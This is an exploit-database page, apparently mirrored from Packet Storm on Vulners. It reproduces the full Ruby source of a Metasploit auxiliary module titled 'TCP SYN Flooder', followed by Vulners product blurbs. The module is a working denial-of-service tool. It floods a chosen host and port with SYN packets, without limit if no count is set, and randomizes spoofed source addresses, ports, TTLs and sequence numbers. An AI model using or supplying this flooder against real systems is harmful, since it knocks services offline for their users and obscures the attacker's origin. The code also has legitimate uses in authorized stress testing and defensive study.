Lucene search
K

TCP SYN Flooder

🗓️ 31 Aug 2024 00:00:00Reported by Kris Katterjohn, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 172 Views

TCP SYN Flooder to initiate TCP SYN flood attack

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Capture  
include Msf::Auxiliary::Dos  
  
def initialize  
super(  
'Name' => 'TCP SYN Flooder',  
'Description' => 'A simple TCP SYN flooder',  
'Author' => 'kris katterjohn',  
'License' => MSF_LICENSE  
)  
  
register_options([  
Opt::RPORT(80),  
OptAddress.new('SHOST', [false, 'The spoofable source address (else randomizes)']),  
OptInt.new('SPORT', [false, 'The source port (else randomizes)']),  
OptInt.new('NUM', [false, 'Number of SYNs to send (else unlimited)'])  
])  
  
deregister_options('FILTER','PCAPFILE')  
end  
  
def sport  
datastore['SPORT'].to_i.zero? ? rand(65535)+1 : datastore['SPORT'].to_i  
end  
  
def rport  
datastore['RPORT'].to_i  
end  
  
def srchost  
datastore['SHOST'] || [rand(0x100000000)].pack('N').unpack('C*').join('.')  
end  
  
def run  
open_pcap  
  
sent = 0  
num = datastore['NUM'] || 0  
  
print_status("SYN flooding #{rhost}:#{rport}...")  
  
p = PacketFu::TCPPacket.new  
p.ip_saddr = srchost  
p.ip_daddr = rhost  
p.tcp_dport = rport  
p.tcp_flags.syn = 1  
  
while (num <= 0) or (sent < num)  
p.ip_ttl = rand(128)+128  
p.tcp_win = rand(4096)+1  
p.tcp_sport = sport  
p.tcp_seq = rand(0x100000000)  
p.recalc  
break unless capture_sendto(p,rhost)  
sent += 1  
end  
  
close_pcap  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
172